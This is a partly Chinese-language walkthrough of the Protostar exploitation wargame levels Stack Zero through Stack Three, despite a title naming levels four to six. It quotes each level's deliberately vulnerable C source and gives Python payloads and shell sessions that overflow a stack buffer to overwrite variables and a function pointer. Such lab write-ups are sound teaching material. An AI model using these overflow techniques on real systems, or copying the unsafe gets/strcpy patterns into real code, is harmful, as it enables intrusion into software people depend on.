Stack Four ~ Six
Stack Zero
This level introduces the concept that memory can be accessed outside of its allocated region, how the stack variables are laid out, and that modifying outside of the allocated memory can modify program execution.
This level is at /opt/protostar/bin/stack0
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
int main(int argc, char **argv)
{
volatile int modified;
char buffer[64];
modified = 0;
gets(buffer);
if(modified != 0) {
printf("you have changed the 'modified' variable\n");
} else {
printf("Try again?\n");
}
}
重点是这三句话
char buffer[64];
modified = 0;
gets(buffer);
总结来说直接输入 65 个字符就可以了
user@protostar:/tmp$ echo "print \"A\" * 65"
print "A" * 65
user@protostar:/tmp$ echo "print \"A\" * 65" > stack0.py
user@protostar:/tmp$ python stack0.py | /opt/protostar/bin/stack0
you have changed the 'modified' variable
user@protostar:/tmp$
Stack One
This level looks at the concept of modifying variables to specific values in the program, and how the variables are laid out in memory.
This level is at /opt/protostar/bin/stack1
Hints
- If you are unfamiliar with the hexadecimal being displayed, “man ascii” is your friend.
- Protostar is little endian
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>
int main(int argc, char **argv)
{
volatile int modified;
char buffer[64];
if(argc == 1) {
errx(1, "please specify an argument\n");
}
modified = 0;
strcpy(buffer, argv[1]);
if(modified == 0x61626364) {
printf("you have correctly got the variable to the right value\n");
} else {
printf("Try again, you got 0x%08x\n", modified);
}
}
这里需要使 modified == 0x61626364
需要注意小端序
user@protostar:/tmp$ more stack1.py
padding = "A" * 64
modified = "\x64\x63\x62\x61"
print (padding + modified)
user@protostar:/tmp$ python stack1.py > st1
user@protostar:/tmp$ /opt/protostar/bin/stack1 "$(< st1)"
you have correctly got the variable to the right value
user@protostar:/tmp$
Stack Two
Stack2 looks at environment variables, and how they can be set.
This level is at /opt/protostar/bin/stack2
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>
int main(int argc, char **argv)
{
volatile int modified;
char buffer[64];
char *variable;
variable = getenv("GREENIE");
if(variable == NULL) {
errx(1, "please set the GREENIE environment variable\n");
}
modified = 0;
strcpy(buffer, variable);
if(modified == 0x0d0a0d0a) {
printf("you have correctly modified the variable\n");
} else {
printf("Try again, you got 0x%08x\n", modified);
}
}
主要是设置环境变量的问题
user@protostar:/tmp$ more stack2.py
padding = "A" * 64
modified = "\x0a\x0d\x0a\x0d"
print (padding + modified)
user@protostar:/tmp$ python stack2.py > st2
user@protostar:/tmp$ export GREENIE=$(cat st2)
user@protostar:/tmp$ echo $GREENIE
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
user@protostar:/tmp$ /opt/protostar/bin/stack2
you have correctly modified the variable
user@protostar:/tmp$
Stack Three
Stack3 looks at environment variables, and how they can be set, and overwriting function pointers stored on the stack (as a prelude to overwriting the saved EIP)
Hints
- both gdb and objdump is your friend you determining where the win() function lies in memory.
This level is at /opt/protostar/bin/stack3
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>
void win()
{
printf("code flow successfully changed\n");
}
int main(int argc, char **argv)
{
volatile int (*fp)();
char buffer[64];
fp = 0;
gets(buffer);
if(fp) {
printf("calling function pointer, jumping to 0x%08x\n", fp);
fp();
}
}
重点是找到 void win() 在哪
可以使用 objdump -t
-t
–syms
Print the symbol table entries of the file. This is similar to the information provided by the nm program, although the display format is different.
user@protostar:/tmp$ objdump -t /opt/protostar/bin/stack3 | grep win
08048424 g F .text 00000014 win
可见是 0x08048424
user@protostar:/tmp$ more stack3.py
padding = "A" * 64
win = "\x24\x84\x04\x08"
print (padding + win)
user@protostar:/tmp$ python stack3.py | /opt/protostar/bin/stack3
calling function pointer, jumping to 0x08048424
code flow successfully changed
user@protostar:/tmp$